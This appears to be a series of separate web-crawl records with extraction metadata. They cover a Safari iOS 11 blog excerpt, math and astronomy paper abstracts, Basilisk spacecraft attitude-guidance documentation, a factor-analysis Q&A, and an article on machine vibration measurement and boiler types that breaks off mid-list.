going to get better. From the more incremental improvements in iOS 10, it is hard to argue that Safari is Apple’s most mature, even its best iOS app. In iOS 11, Safari comes loaded with all kinds of new tricks. Like macOS, there is further control granted to user permissions. Although, it is more clear the influence iOS has had on the Mac. There is also the addition of WebRTC and media capture, and even access to experimental features. Nobody could argue that iOS — the iPhone in particular —hasn’t significantly influenced web technology. One of its most significant achievements is surely that hand it played in burying Flash. I would argue that this trend is going to continue through the extension of new features in Safari. ### Look Again If, for whatever reason, you have held on to the impression that Safari is a clunky waste of time, trust me it is worth another look. You don’t have to go far to find lingering impressions of the browser are outdated. 3 I know, I was a subscriber to that view. Even for established users, there are new reasons to to use Safari. The changes in macOS High Sierra and iOS 11 are impressive. Apple has found a way to make privacy its point of difference. While I would urge people to see that for what it is, I’m not churlish enough to overlook the way it benefits users. These a big improvements. 1. Despite what other browsers may claim 2. The Notes App is a particularly good example of this. 3. The icon in that link was replaced more than 3 years ago. The browser is unrecognisable from that time.
2022-01-16 10:09:27
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.20218464732170105, "perplexity": 1692.8369862193979}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320299852.23/warc/CC-MAIN-20220116093137-20220116123137-00175.warc.gz"}
https://ftp.aimsciences.org/article/doi/10.3934/dcdsb.2013.18.2283
# American Institute of Mathematical Sciences November  2013, 18(9): 2283-2313. doi: 10.3934/dcdsb.2013.18.2283 ## Dynamics of a ratio-dependent predator-prey system with a strong Allee effect 1 School of Mathematics and Statistics, Lanzhou University, Lanzhou 730000, China 2 Department of Mathematics, University of Louisville, Louisville, KY 40292 Received  September 2012 Revised  May 2013 Published  September 2013 A ratio-dependent predator-prey model with a strong Allee effect in prey is studied. We show that the model has a Bogdanov-Takens bifurcation that is associated with a catastrophic crash of the predator population. Our analysis indicates that an unstable limit cycle bifurcates from a Hopf bifurcation, and it disappears due to a homoclinic bifurcation which can lead to different patterns of global population dynamics in the model. We study the heteroclinic orbits and determine all possible phase portraits when the Bogdanov-Takens bifurcation occurs. We also provide the conditions for nonexistence of limit cycle under which the global dynamics of the model can be determined. Citation: Yujing Gao, Bingtuan Li. Dynamics of a ratio-dependent predator-prey system with a strong Allee effect. Discrete and Continuous Dynamical Systems - B, 2013, 18 (9) : 2283-2313. doi: 10.3934/dcdsb.2013.18.2283 ##### References: show all references ##### References: [1] Bing Zeng, Shengfu Deng, Pei Yu. Bogdanov-Takens bifurcation in predator-prey systems. Discrete and Continuous Dynamical Systems - S, 2020, 13 (11) : 3253-3269. doi: 10.3934/dcdss.2020130 [2] Tongtong Chen, Jixun Chu. Hopf bifurcation for a predator-prey model with age structure and ratio-dependent response function incorporating a prey refuge. Discrete and Continuous Dynamical Systems - B, 2022  doi: 10.3934/dcdsb.2022082 [3] Jicai Huang, Sanhong Liu, Shigui Ruan, Xinan Zhang. Bogdanov-Takens bifurcation of codimension 3 in a predator-prey model with constant-yield predator harvesting. Communications on Pure and Applied Analysis, 2016, 15 (3) : 1041-1055. doi: 10.3934/cpaa.2016.15.1041 [4] Xinyu Song, Liming Cai, U. Neumann. Ratio-dependent predator-prey system with stage structure for prey. Discrete and Continuous Dynamical Systems - B, 2004, 4 (3) : 747-758. doi: 10.3934/dcdsb.2004.4.747 [5] Qizhen Xiao, Binxiang Dai. Heteroclinic bifurcation for a general predator-prey model with Allee effect and state feedback impulsive control strategy. Mathematical Biosciences & Engineering, 2015, 12 (5) : 1065-1081. doi: 10.3934/mbe.2015.12.1065 [6] Zuolin Shen, Junjie Wei. Hopf bifurcation analysis in a diffusive predator-prey system with delay and surplus killing effect. Mathematical Biosciences & Engineering, 2018, 15 (3) : 693-715. doi: 10.3934/mbe.2018031 [7] Inkyung Ahn, Wonlyul Ko, Kimun Ryu. Asymptotic behavior of a ratio-dependent predator-prey system with disease in the prey. Conference Publications, 2013, 2013 (special) : 11-19. doi: 10.3934/proc.2013.2013.11 [8] Qian Cao, Yongli Cai, Yong Luo. Nonconstant positive solutions to the ratio-dependent predator-prey system with prey-taxis in one dimension. Discrete and Continuous Dynamical Systems - B, 2022, 27 (3) : 1397-1420. doi: 10.3934/dcdsb.2021095 [9] Xin Jiang, Zhikun She, Shigui Ruan. Global dynamics of a predator-prey system with density-dependent mortality and ratio-dependent functional response. Discrete and Continuous Dynamical Systems - B, 2021, 26 (4) : 1967-1990. doi: 10.3934/dcdsb.2020041 [10] Benjamin Leard, Catherine Lewis, Jorge Rebaza. Dynamics of ratio-dependent Predator-Prey models with nonconstant harvesting. Discrete and Continuous Dynamical Systems - S, 2008, 1 (2) : 303-315. doi: 10.3934/dcdss.2008.1.303 [11] Xiaoling Zou, Dejun Fan, Ke Wang. Stationary distribution and stochastic Hopf bifurcation for a predator-prey system with noises. Discrete and Continuous Dynamical Systems - B, 2013, 18 (5) : 1507-1519. doi: 10.3934/dcdsb.2013.18.1507 [12] Zhicheng Wang, Jun Wu. Existence of positive periodic solutions for delayed ratio-dependent predator-prey system with stocking. Communications on Pure and Applied Analysis, 2006, 5 (3) : 423-433. doi: 10.3934/cpaa.2006.5.423 [13] Na Min, Mingxin Wang. Hopf bifurcation and steady-state bifurcation for a Leslie-Gower prey-predator model with strong Allee effect in prey. Discrete and Continuous Dynamical Systems, 2019, 39 (2) : 1071-1099. doi: 10.3934/dcds.2019045 [14] Xiaoyuan Chang, Junjie Wei. Stability and Hopf bifurcation in a diffusive predator-prey system incorporating a prey refuge. Mathematical Biosciences & Engineering, 2013, 10 (4) : 979-996. doi: 10.3934/mbe.2013.10.979 [15] Hongyong Zhao, Daiyong Wu. Point to point traveling wave and periodic traveling wave induced by Hopf bifurcation for a diffusive predator-prey system. Discrete and Continuous Dynamical Systems - S, 2020, 13 (11) : 3271-3284. doi: 10.3934/dcdss.2020129 [16] Canan Çelik. Dynamical behavior of a ratio dependent predator-prey system with distributed delay. Discrete and Continuous Dynamical Systems - B, 2011, 16 (3) : 719-738. doi: 10.3934/dcdsb.2011.16.719 [17] Marcos Lizana, Julio Marín. On the dynamics of a ratio dependent Predator-Prey system with diffusion and delay. Discrete and Continuous Dynamical Systems - B, 2006, 6 (6) : 1321-1338. doi: 10.3934/dcdsb.2006.6.1321 [18] Sze-Bi Hsu, Junping Shi. Relaxation oscillation profile of limit cycle in predator-prey system. Discrete and Continuous Dynamical Systems - B, 2009, 11 (4) : 893-911. doi: 10.3934/dcdsb.2009.11.893 [19] Xun Cao, Xianyong Chen, Weihua Jiang. Bogdanov-Takens bifurcation with $Z_2$ symmetry and spatiotemporal dynamics in diffusive Rosenzweig-MacArthur model involving nonlocal prey competition. Discrete and Continuous Dynamical Systems, 2022, 42 (8) : 3747-3785. doi: 10.3934/dcds.2022031 [20] Min Lu, Chuang Xiang, Jicai Huang. Bogdanov-Takens bifurcation in a SIRS epidemic model with a generalized nonmonotone incidence rate. Discrete and Continuous Dynamical Systems - S, 2020, 13 (11) : 3125-3138. doi: 10.3934/dcdss.2020115 2021 Impact Factor: 1.497
2022-07-02 23:43:36
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5424638390541077, "perplexity": 4540.34311429253}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104205534.63/warc/CC-MAIN-20220702222819-20220703012819-00530.warc.gz"}
https://hanspeterschaub.info/basilisk/Documentation/fswAlgorithms/attGuidance/locationPointing/locationPointing.html
Module: locationPointing¶ Executive Summary¶ This module generates an attitude guidance message to make a specified spacecraft pointing vector target an inertial location. This location could be on a planet if this module is connected with Module: groundLocation for example. Message Connection Descriptions¶ The following table lists all the module input and output messages. The module msg connection is set by the user from python. The msg type contains a link to the message structure definition, while the description provides information on what this message is used for. Module I/O Messages Msg Variable Name Msg Type Description scAttInMsg input msg with inertial spacecraft attitude states scTransInMsg input msg with inertial spacecraft translational states locationInMsg input msg containing the inertial point location of interest celBodyInMsg (alternative) input msg containing the inertial point location of a celestial body of interest AttGuidOutMsg output message with the attitude guidance AttRefOutMsg output message with the attitude reference Detailed Module Description¶ The inertial location of interest is given by $${\bf r}_{L/N}$$ and can be either extracted from locationInMsg when a location on a planet is provided, or celBodyInMsg when a celestial body’s ephemeris location is provided (for pointing at the Sun or the Earth). The vector pointing from the satellite location $${\bf r}_{S/N}$$ to this location is then ${\bf r}_{L/S} = {\bf r}_{L/N} - {\bf r}_{S/N}$ Let $$\hat{\bf r}_{L/S}$$ be the normalized heading vector to this location. The unit vector $$\hat{\bf p}$$ is a body-fixed vector and denotes the body axis which is to point towards the desired location $$L$$. Thus this modules performs a 2-degree of freedom attitude guidance and control solution. The eigen-axis to rotate $$\hat{\bf p}$$ towards $$\hat{\bf r}_{L/S}$$ is given by $\hat{\bf e} = \frac{\hat{\bf p} \times \hat{\bf r}_{L/S}}{|\hat{\bf p} \times \hat{\bf r}_{L/S}|}$ The principle rotation angle $$\phi$$ is $\phi = \arccos (\hat{\bf p} \cdot \hat{\bf r}_{L/S} )$ The attitude tracking error $${\pmb\sigma}_{B/R}$$ is then given by ${\pmb\sigma}_{B/R} = - \tan(\phi/4) \hat{\bf e}$ The tracking error rates $${\pmb\omega}_{B/R}$$ are obtained through numerical differentiation of the MRP values. During the first module Update evaluation the numerical differencing is not possible and this value is thus set to zero. Using the attitude navigation and guidance messages, this module also computes the reference information in the form of attRefOutMsg. This additional output message is useful when working with modules that need a reference message and cannot accept a guidance message. Note The module checks for several conditions such as heading vectors being collinear, the MRP switching during the numerical differentiation, etc. User Guide¶ The one required variable that must be set is pHat_B. This is body-fixed unit vector which is to be pointed at the desired inertial location. The user should only connect one location of interest input message, either locationInMsg or celBodyInMsg. Connecting both will result in a warning and the module defaults to using the locationInMsg information. This 2D attitude control module provides two output messages in the form of AttGuidMsgPayload and AttRefMsgPayload. The first guidance message, describing body relative to reference tracking errors, can be directly connected to an attitude control module. However, at times we need to have the attitude reference message as the output to feed to Module: attTrackingError. Here the B/R states are subtracted from the B/N states to obtain the equivalent R/N states. The variable smallAngle defined the minimum angular separation where two vectors are considered colinear. It is defaulted to zero, but can be set to any desired value in radians. By default this is a 2D attitude control module in attitude and a 2D rate control. In particular, the rates about the desired heading axis are not damped. By setting the module variable useBoresightRateDamping to 1, the body rates about about the desired heading angle are added to the rate tracking error yielding a 3D rate control implementation. Functions void SelfInit_locationPointing(locationPointingConfig *configData, int64_t moduleID) This method initializes the output messages for this module. Parameters • configData – The configuration data associated with this module • moduleID – The module identifier Returns void void Update_locationPointing(locationPointingConfig *configData, uint64_t callTime, int64_t moduleID) This method takes the estimated body states and position relative to the ground to compute the current attitude/attitude rate errors and pass them to control. Parameters • configData – The configuration data associated with the module • callTime – The clock time at which the function was called (nanoseconds) • moduleID – The module identifier Returns void void Reset_locationPointing(locationPointingConfig *configData, uint64_t callTime, int64_t moduleID) This method performs a complete reset of the module. Local module variables that retain time varying states between function calls are reset to their default values. Check if required input messages are connected. Parameters • configData – The configuration data associated with the module • callTime – [ns] time the method is called • moduleID – The module identifier Returns void struct locationPointingConfig #include <locationPointing.h> This module is used to generate the attitude reference message in order to have a spacecraft point at a location on the ground. Public Members double pHat_B[3] body fixed vector that is to be aimed at a location double smallAngle rad An angle value that specifies what is near 0 or 180 degrees int useBoresightRateDamping [int] flag to use rate damping about the sensor boresight double sigma_BR_old[3] Older sigma_BR value, stored for finite diff uint64_t time_old [ns] prior time value double init moudle initialization counter double eHat180_B[3] Eigen axis to use if commanded axis is 180 from pHat NavAttMsg_C scAttInMsg input msg with inertial spacecraft attitude states NavTransMsg_C scTransInMsg input msg with inertial spacecraft attitude states GroundStateMsg_C locationInMsg input msg with location relative to planet EphemerisMsg_C celBodyInMsg input celestial body message AttGuidMsg_C attGuidOutMsg attitude guidance output message AttRefMsg_C attRefOutMsg attitude reference output message BSKLogger *bskLogger BSK Logging.
2021-12-08 03:44:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3870023488998413, "perplexity": 3723.26074415621}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964363437.15/warc/CC-MAIN-20211208022710-20211208052710-00404.warc.gz"}
https://stats.stackexchange.com/questions/478048/eigenvalues-in-exploratory-factor-analysis-in-r-using-psychfa
# Eigenvalues in exploratory factor analysis in R using psych::fa I've run an EFA in R using the fa() function, extracting 6 factors from a pool of 22 items. From what I understand, the line in the fa output labeled 'SS loadings' presents the eigenvalues of each factor. However, when I run ModelName$values (which according to the help package presents 'Eigen values of the common factor solution') I get different values to those presented in 'SS loadings'. My question is: why are these two values different, and which represents the eigenvalues that I should be reporting? • i think eigenvalues can be obtained using fa.parallel()$fa.values – Grace Oct 15 at 12:46
2020-11-25 08:04:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4953029155731201, "perplexity": 2236.0288355569155}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141181482.18/warc/CC-MAIN-20201125071137-20201125101137-00004.warc.gz"}
https://www.semanticscholar.org/paper/TOWARD-PRECISE-AGES-FOR-SINGLE-STARS-IN-THE-FIELD.-Chanam'e-Ram'irez/8bcfcb3aef3b2a34342f2c8bedf2aeb6c181ffbe
# TOWARD PRECISE AGES FOR SINGLE STARS IN THE FIELD. GYROCHRONOLOGY CONSTRAINTS AT SEVERAL Gyr USING WIDE BINARIES. I. AGES FOR INITIAL SAMPLE @article{Chaname2012TOWARDPA, title={TOWARD PRECISE AGES FOR SINGLE STARS IN THE FIELD. GYROCHRONOLOGY CONSTRAINTS AT SEVERAL Gyr USING WIDE BINARIES. I. AGES FOR INITIAL SAMPLE}, author={Julio Chanam'e and Iv'an Ram'irez}, journal={The Astrophysical Journal}, year={2012}, volume={746}, pages={102} } • Published 31 August 2011 • Physics • The Astrophysical Journal We present a program designed to obtain age-rotation measurements of solar-type dwarfs to be used in the calibration of gyrochronology relations at ages of several Gyr. This is a region of parameter space crucial for the large-scale study of the Milky Way, and where the only constraint available today is that provided by the Sun. Our program takes advantage of a set of wide binaries selected so that one component is an evolved star and the other is a main-sequence star of FGK type. In this way… Expand 33 Citations #### Figures and Tables from this paper Chemical Evolution in the Milky Way: Rotation-based Ages for APOGEE-Kepler Cool Dwarf Stars We use models of stellar angular momentum evolution to determine ages for $\sim500$ stars in the APOGEE-\textit{Kepler} Cool Dwarfs sample. We focus on lower main-sequence stars, where otherExpand On the identification of wide binaries in the Kepler field • Physics • Monthly Notices of the Royal Astronomical Society • 2018 We perform a search for wide binaries in the Kepler field with the prospect of providing new constraints for gyrochronology. First, we construct our base catalog by compiling astrometry for the starsExpand Using APOGEE Wide Binaries to Test Chemical Tagging with Dwarf Stars Stars of a common origin are thought to have similar, if not nearly identical, chemistry. Chemical tagging seeks to exploit this fact to identify Milky Way subpopulations through their uniqueExpand Wide binaries in Tycho-Gaia II: metallicities, abundances and prospects for chemical tagging • Physics • 2018 From our recent catalog based on the first Gaia data release (TGAS), we select wide binaries in which both stars have been observed by the Radial Velocity Experiment (RAVE) or the Large Sky AreaExpand Rotation and magnetism of Kepler pulsating solar-like stars : Towards asteroseismically calibrated age-rotation relations Kepler ultra-high precision photometry of long and continuous observations provides a unique dataset in which surface rotation and variability can be studied for thousands of stars. Because many ofExpand A distant sample of halo wide binaries from SDSS • Physics • Monthly Notices of the Royal Astronomical Society • 2018 Samples of reliably identified halo wide binaries are scarce. If reasonably free from selection effects and with a small degree of contamination by chance alignments, these wide binaries become aExpand Rotation, differential rotation, and gyrochronology of active Kepler stars • Physics • 2015 The high-precision photometry from the CoRoT and Kepler satellites has led to measurements of surface rotation periods for tens of thousands of stars. Our main goal is to derive ages of thousands ofExpand The Solar Twin Planet Search Context. It is well known that the magnetic activity of solar-type stars decreases with age, but it is widely debated in the literature whether there is a smooth decline or if there is an early sharpExpand Comoving stars in Gaia DR1: An abundance of very wide separation co-moving pairs • Physics • 2016 The primary sample of the {\it Gaia} Data Release 1 is the Tycho-Gaia Astrometric Solution (TGAS): $\approx$ 2 million Tycho-2 sources with improved parallaxes and proper motions relative to theExpand Spectroscopic orbits of nearby stars • Physics • Astronomy & Astrophysics • 2019 Aims. We observed stars with variable radial velocities to determine their spectroscopic orbits. Methods. Velocities are presented of 132 targets taken over a time span reaching 30 years. These wereExpand #### References SHOWING 1-10 OF 77 REFERENCES Time evolution of high-energy emissions of low-mass stars : I. Age determination using stellar chronology with white dwarfs in wide binaries • Physics • 2011 Context. Stellar ages are extremely diffi cult to determine and often subject to large uncertainties, especially for field low-mass stars. We plan to carry out a calibration of the decrease inExpand Ages for illustrative field stars using gyrochronology: viability, limitations and errors We here develop an improved way of using a rotating star as a clock, set it using the Sun, and demonstrate that it keeps time well. This technique, called gyrochronology, derives ages for low-massExpand The Ages of Stars The age of an individual star cannot be measured, only estimated through mostly model-dependent or empirical methods, and no single method works well for a broad range of stellar types or for a fullExpand Stellar Rotation in M35: Mass-Period Relations, Spin-Down Rates, and Gyrochronology • Physics • 2008 We present the results of a five month photometric time-series survey for stellar rotation over a 40' × 40' field centered on the 150 Myr open cluster M35. We report rotation periods for 441 starsExpand On the Rotational Evolution of Solar- and Late-Type Stars, Its Magnetic Origins, and the Possibility of Stellar Gyrochronology* We propose a simple interpretation of the rotation period data for solar- and late-type stars. The open cluster and Mount Wilson star observations suggest that rotating stars lie primarily on twoExpand Basic physical parameters of a selected sample of evolved stars We present the detailed spectroscopic analysis of 72 evolved stars, which were previously studied for accurate radial velocity variations. Using one Hyades giant and another well studied star as theExpand Abundance difference between components of wide binaries We present iron abundance analysis for 23 wide binaries with main sequence components in the temperture range 4900-6300 K, taken from the sample of the pairs currently included in the radial velocityExpand NEARBY STARS FROM THE LSPM-NORTH PROPER-MOTION CATALOG. I. MAIN-SEQUENCE DWARFS AND GIANTS WITHIN 33 PARSECS OF THE SUN A list of 4131 dwarfs, subgiants, and giants located or suspected to be located within 33 pc of the Sun is presented. All the stars are drawn from the new Lepine Shara Proper Motion (LSPM)–NorthExpand A SIMPLE NONLINEAR MODEL FOR THE ROTATION OF MAIN-SEQUENCE COOL STARS. I. INTRODUCTION, IMPLICATIONS FOR GYROCHRONOLOGY, AND COLOR-PERIOD DIAGRAMS We here introduce a simple nonlinear model to describe the rotational evolution of cool stars on the main sequence. It is formulated only in terms of the Rossby number (Ro = P/τ), its inverse, andExpand Stellar rotation in lower main-sequence stars measured from time variations in H and K emission-line fluxes. II. Detailed analysis of the 1980 observing season data. For a sample of 47 lower main-sequence stars, including the Sun, and eight evolved stars, the relative strength of the Ca n H and K emission cores has been measured daily over a nearly continuousExpand
2021-12-06 00:35:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.40214309096336365, "perplexity": 5093.129042125665}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964363226.68/warc/CC-MAIN-20211205221915-20211206011915-00252.warc.gz"}
https://www.projecteuclid.org/euclid.ecp/1465315581
## Electronic Communications in Probability ### A note on the series representation for the density of the supremum of a stable process #### Abstract An absolutely convergent double series representation for the density of the supremum of $\alpha$-stable Lévy process was obtained by Hubalek and Kuznetsov for almost all irrational $\alpha$. This result cannot be made stronger in the following sense: the series does not converge absolutely when $\alpha$ belongs to a certain subset of irrational numbers of Lebesgue measure zero. Our main result in this note shows that for every irrational $\alpha$ there is a way to rearrange the terms of the double series, so that it converges to the density of the supremum. We show how one can establish this stronger result by introducing a simple yet non-trivial modification in the original proof of Hubalek and Kuznetsov. #### Article information Source Electron. Commun. Probab., Volume 18 (2013), paper no. 42, 5 pp. Dates Accepted: 6 June 2013 First available in Project Euclid: 7 June 2016 https://projecteuclid.org/euclid.ecp/1465315581 Digital Object Identifier doi:10.1214/ECP.v18-2757 Mathematical Reviews number (MathSciNet) MR3070908 Zentralblatt MATH identifier 1323.60065 Subjects Primary: 60G52: Stable processes Rights #### Citation Hackmann, Daniel; Kuznetsov, Alexey. A note on the series representation for the density of the supremum of a stable process. Electron. Commun. Probab. 18 (2013), paper no. 42, 5 pp. doi:10.1214/ECP.v18-2757. https://projecteuclid.org/euclid.ecp/1465315581 #### References • Buslaev, V. I. On the convergence of the Rogers-Ramanujan continued fraction. (Russian) Mat. Sb. 194 (2003), no. 6, 43–66; translation in Sb. Math. 194 (2003), no. 5-6, 833–856 • Doney, R. A. On Wiener-Hopf factorisation and the distribution of extrema for certain stable processes. Ann. Probab. 15 (1987), no. 4, 1352–1362. • Hubalek, F.; Kuznetsov, A. A convergent series representation for the density of the supremum of a stable process. Electron. Commun. Probab. 16 (2011), 84–95. • Khinchin, A. Ya. Continued fractions. The University of Chicago Press, Chicago, Ill.-London 1964 xi+95 pp. • Kuznetsov, A. On extrema of stable processes. Ann. Probab. 39 (2011), no. 3, 1027–1060. • Kuznetsov, A. On the density of the supremum of a stable process. Stochastic Process. Appl. 123 (2013), no. 3, 986–1003. • Petruska, G. On the radius of convergence of $q$-series. Indag. Math. (N.S.) 3 (1992), no. 3, 353–364. • Zolotarev, V. M. One-dimensional stable distributions. Translations of Mathematical Monographs, 65. American Mathematical Society, Providence, RI, 1986. x+284 pp. ISBN: 0-8218-4519-5
2019-09-23 14:53:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6683602929115295, "perplexity": 574.5657416897544}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514576965.71/warc/CC-MAIN-20190923125729-20190923151729-00093.warc.gz"}
https://technology-articles.com/category/mechanical/
## What is Relative and Absolute Vibration? Before we continue the discussion about relative and absolute vibrations, we need to straighten out this matter first. Relative and absolute vibration is not included in one of the vibration classifications (read the following article to find out the classification of vibrations). Relative and absolute vibration is only a method of viewpoint, for measuring vibration. Relative Vibration As the name implies, relative is a measuring technique that refers to a certain point that is not silent. Then relative vibration is a measurement of vibration (either displacement, speed, or acceleration) measured relative to the position of the vibration sensor. We take for example in measuring the engine shaft vibration according to the picture above. The shaft vibration measuring instrument in the form of an eddy current sensor is installed very close to the engine bearing position. So that when a vibration arises on the engine shaft, the sensor will read the vibration whose value is relative to the position of the transducer. If there is a simultaneous vibration between the shaft and the engine bearing, the vibration sensor will read zero. When this happens, the condition of the installation of the engine foundation against the basic foundation must be considered. Vice versa, if there is vibration on the engine shaft due to bearing failure, for example, the transducer sensor will read high vibration value relative to the sensor position. In other words, if relative vibration occurs then it is estimated that damage occurs on the engine bearing. There are two ways to use eddy current sensors, first is using one sensor. If this is used, the sensor is placed just above the center of the bearing. Whereas the second method is to use two sensors that are paired at +45° and -45° from the vertical line of the shaft (according to the image below). Eddy current sensors require a conversion process so that the reading of the sensor output voltage can be changed to a displacement value. If you want to know the velocity value, you need an integration process from the displacement value, and double integration if you want to know the relative acceleration value of vibration. Absolute Vibration Absolute is a measuring technique that refers to a stationary point in free space. Then absolute vibration is a measurement of vibration (either displacement, speed, or acceleration) measured against a stationary point in free space. Generally absolute vibration measurements only use speed transducers or accelerator. The speed transducer sensor is equipped with a coil as a reference point, while the acceleration transducer uses a mass. Absolute vibration on a machine shaft cannot be measured directly. A real-time measurement method and calculation is needed. Measuring the absolute vibration of a machine shaft as shown above, it is necessary to measure the relative displacement of the shaft using the same eddy current sensor as in the measurement of relative vibration. It is also necessary to measure absolute vibration on the bearing using an accelerometer sensor or speed sensor, which is set to have the same axis as the position of the eddy current sensor. The absolute vibration value of the shaft is obtained by calculating the difference between the relative vibration of the shaft, and the absolute vibration of the bearing. The calculated absolute vibration value of the shaft can be in the form of 0-peak displacement, or also peak-peak displacement as shown in the graph below. As for calculating vibration speed, an integration process of absolute displacement values ​​is needed. While the value of vibration acceleration is obtained by double integration. References: ## Classification of Boiler Boilers are a tool for creating steam. The existence of boilers has been important since its development in the range of the 18th and 19th centuries. Boilers also took an important role in the era of the Industrial Revolution and encouraged various other important discoveries. In subsequent developments many studies have succeeded in bringing out a variety of new boiler designs. To classify a boiler, we can only do it by looking at it from various points of view. These various perspectives depend on the design of the three constituent components of the boiler, the elements of water, steam, and combustion chamber. For more details, let’s discuss one by one. Classification of boiler based on the relative position of steam with the combustion chamber 1. Fire-tube boiler Fire-tube boilers are the simplest type of boiler. This boiler allows it to be applied from low to medium steam requirements. This is possible because the design is not complicated than a water-tube boiler. As the name implies, fire-tube boilers deliver hot gas from the combustion to the pipes which are covered by water. Hot gas from the combustion of fuel in the combustion chamber (furnace) is passed to these special pipes before being discharged into the atmosphere. Fire-tube boilers have a very simple design that only requires less space. In fact, many of these boiler designs allow it to be moved to one place to another. However, fire-tube boilers have limited steam production which is only a maximum of 9000 kg/hour with a maximum pressure of 17 bar. Fire-tube boilers themselves can still be classified into several types: • Haystack Boiler • This boiler is the simplest design boiler. Only composed of a giant stove carrying a large pan. This pan-shaped boiler was once inspired by a cooking pot. Whether in the century, how many boilers have started to be developed, but nowadays boilers that are only capable of working at a maximum pressure of 5 psi are rarely encountered. However, the Haystack boiler became the forerunner to the development of a variety of new boiler designs until the discovery of a modern fire-pipe boiler design. (Credit: Science Museum Group) • Center-flue Boiler In 